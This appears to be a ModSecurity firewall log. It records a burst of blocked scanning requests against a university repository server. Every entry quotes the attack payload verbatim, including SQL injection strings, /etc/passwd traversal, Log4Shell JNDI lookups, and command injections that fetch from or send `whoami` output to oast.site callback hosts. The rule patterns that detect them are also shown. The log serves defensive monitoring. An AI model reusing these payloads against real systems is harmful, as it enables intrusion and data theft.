[Tue Aug 29 11:31:17.317527 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:apikey. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:apikey: 'UNION select 1,'YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=';"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/fw.login.php"] [unique_id "ZO10lcCo-f0AAAOM4dwAAAAU"]
[Tue Aug 29 11:31:17.323488 2023] [:error] [pid 1012] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../ found within ARGS:path: /var/www/documentation/../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/webui/file_guest"] [unique_id "ZO10lcCo-f0AAAP05KUAAAAA"]
[Tue Aug 29 11:31:17.327960 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:lib_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:lib_path: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10lcCo-f0AAAN@5DkAAAAO"]
[Tue Aug 29 11:31:18.405257 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:payload. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: >../ found within ARGS:payload: `ls>../2UdxkOOWwm6uOELSJnJyclAZM5S`"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/cgi-bin/downloadFlile.cgi"] [unique_id "ZO10lsCo-f0AAAPMmHwAAAAY"]
[Tue Aug 29 11:31:18.443688 2023] [:error] [pid 1033] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:OFBiz.Visitor. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: - found within REQUEST_COOKIES:OFBiz.Visitor: ${jndi:ldap://${:-381}${:-522}.${hostName}.cookie.cjmn8l5jmimk2adbbnlg6wwesrwyfuy1g.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repository.unla.ac.id"] [uri "/webtools/control/main"] [unique_id "ZO10lsCo-f0AAAQJWrgAAAAr"]
[Tue Aug 29 11:31:20.339548 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:template_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:template_path: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/wp-json/lp/v1/courses/archive-course"] [unique_id "ZO10mMCo-f0AAAQMrpwAAAAu"]
[Tue Aug 29 11:31:22.527538 2023] [:error] [pid 1043] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:id`=520)/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,unhex('70726f6a656374646973636f766572792e696f'),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32#sqli. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: /* found within ARGS_NAMES:id`=520)/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,unhex('70726f6a656374646973636f766572792e696f'),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32#sqli: id`=520)/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,unhex('70726f6a656374646973636f766572792e696f'),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32#sqli"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC [hostname "repository.unla.ac.id"] [uri "/search/members/"] [unique_id "ZO10msCo-f0AAAQTKHMAAAA1"]
[Tue Aug 29 11:31:23.323240 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:code. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )-- - found within ARGS:code: a' OR (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO10m8Co-f0AAAQSWLcAAAA0"]
[Tue Aug 29 11:31:24.344217 2023] [:error] [pid 1024] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:yrange. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:yrange: [33:system('wget http:/cjmn8l5jmimk2adbbnlgf1ikpnc1pqn57.oast.site')]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/q"] [unique_id "ZO10nMCo-f0AAAQA-9UAAAAi"]
[Tue Aug 29 11:31:25.364474 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:pingIpAddr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:pingIpAddr: ;curl http:/cjmn8l5jmimk2adbbnlg85iiok664wxue.oast.site -H 'User-Agent: Ri3pKB'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/cgi-bin/system_log.cgi"] [unique_id "ZO10ncCo-f0AAAP@MygAAAAZ"]
[Tue Aug 29 11:31:26.719501 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:settings[view options][outputFunctionName]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:settings[view options][outputFunctionName]: x;process.mainModule.require('child_process').execSync('wget http:/cjmn8l5jmimk2adbbnlgrc3gdbmxyteju.oast.site');s"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/page"] [unique_id "ZO10nsCo-f0AAAP@My0AAAAZ"]
[Tue Aug 29 11:31:27.345557 2023] [:error] [pid 1044] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:bsh.script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:bsh.script: exec(cat/etc/passwd) "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/bsh.servlet.BshServlet"] [unique_id "ZO10n8Co-f0AAAQUH@4AAAA2"]
[Tue Aug 29 11:31:28.595040 2023] [:error] [pid 1037] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:session_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:session_id: ../../../opt/trendmicro/minorityreport/etc/igsa.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/cgi-bin/logoff.cgi"] [unique_id "ZO10oMCo-f0AAAQNwGIAAAAv"]
[Tue Aug 29 11:31:29.193577 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:path: ../../../../../../../../../../../../etc/passwd\\x5c0"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/admin-word-count-column/download-csv.php"] [unique_id "ZO10ocCo-f0AAAPDn6sAAAAP"]
[Tue Aug 29 11:31:29.493750 2023] [:error] [pid 1040] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:opt. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:opt: (cat/etc/passwd)>dtoa.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/include/exportUser.php"] [unique_id "ZO10ocCo-f0AAAQQyloAAAAy"]
[Tue Aug 29 11:31:29.531210 2023] [:error] [pid 1027] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:nx_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) --  found within ARGS:nx_id: sleep(6) -- x"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO10ocCo-f0AAAQDFTsAAAAl"]
[Tue Aug 29 11:31:30.296604 2023] [:error] [pid 1035] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'ARHJ'='ARHJ found within ARGS:id: 1' AND (SELECT 9687 FROM (SELECT(SLEEP(6)))pnac) AND 'ARHJ'='ARHJ"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/admin/suppliers/view_details.php"] [unique_id "ZO10osCo-f0AAAQLC-8AAAAt"]
[Tue Aug 29 11:31:30.383741 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: extractvalue( found within ARGS:uid: 1 and extractvalue(1,concat_ws(1,1,md5(999999999)))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/duomiphp/ajax.php"] [unique_id "ZO10osCo-f0AAAQMrrgAAAAu"]
[Tue Aug 29 11:31:31.304215 2023] [:error] [pid 1037] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:key: ';`wget http:/cjmn8l5jmimk2adbbnlg11sssauozofzk.oast.site`;#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/cgi-bin/login.cgi"] [unique_id "ZO10o8Co-f0AAAQNwG0AAAAv"]
[Tue Aug 29 11:31:32.407028 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:User. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:User:  cat/etc/passwd "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/cgi-bin/kerbynet"] [unique_id "ZO10pMCo-f0AAAP@MzcAAAAZ"]
[Tue Aug 29 11:31:33.400382 2023] [:error] [pid 1033] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/admin/index.php"] [unique_id "ZO10pcCo-f0AAAQJWtkAAAAr"]
[Tue Aug 29 11:31:33.679401 2023] [:error] [pid 1033] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:iface. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:iface: ;curl cjmn8l5jmimk2adbbnlgfmaz86qxuqhxn.oast.site/`whoami`;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/ajax/networking/get_netcfg.php"] [unique_id "ZO10pcCo-f0AAAQJWuAAAAAr"]
[Tue Aug 29 11:31:34.496353 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:param. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:param: 1' and updatexml(1,concat(0x7e,(SELECT md5(999999999)),0x7e),1)-- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/api/sms_check.php"] [unique_id "ZO10psCo-f0AAAQMrtEAAAAu"]
[Tue Aug 29 11:31:35.402603 2023] [:error] [pid 1044] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:pubid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:pubid: 4'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/ebook/bookPerPub.php"] [unique_id "ZO10p8Co-f0AAAQUH-EAAAA2"]
[Tue Aug 29 11:31:36.320814 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-808}${:-319}.${hostName}.username.cjmn8l5jmimk2adbbnlgqf75uiu8xzgac.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/j_security_check"] [unique_id "ZO10qMCo-f0AAAQMrtoAAAAu"]
[Tue Aug 29 11:31:37.333359 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:host. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:host:  cat/etc/passwd "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/api/ping"] [unique_id "ZO10qcCo-f0AAANsATcAAAAD"]
[Tue Aug 29 11:31:37.421583 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  1=1 found within ARGS:username: dw1' or 1=1 #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/zms/admin/index.php"] [unique_id "ZO10qcCo-f0AAAP@M1AAAAAZ"]
[Tue Aug 29 11:31:37.457492 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:discount_code. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) --  found within ARGS:discount_code: '  union select sleep(6) -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO10qcCo-f0AAAQMruEAAAAu"]
[Tue Aug 29 11:31:38.330330 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ztd_password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:ztd_password: $(/bin/wget$IFShttp:/cjmn8l5jmimk2adbbnlgatbqnwzxud34m.oast.site)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/Collector/nms/addModifyZTDProxy"] [unique_id "ZO10qsCo-f0AAAPiBjsAAAAB"]
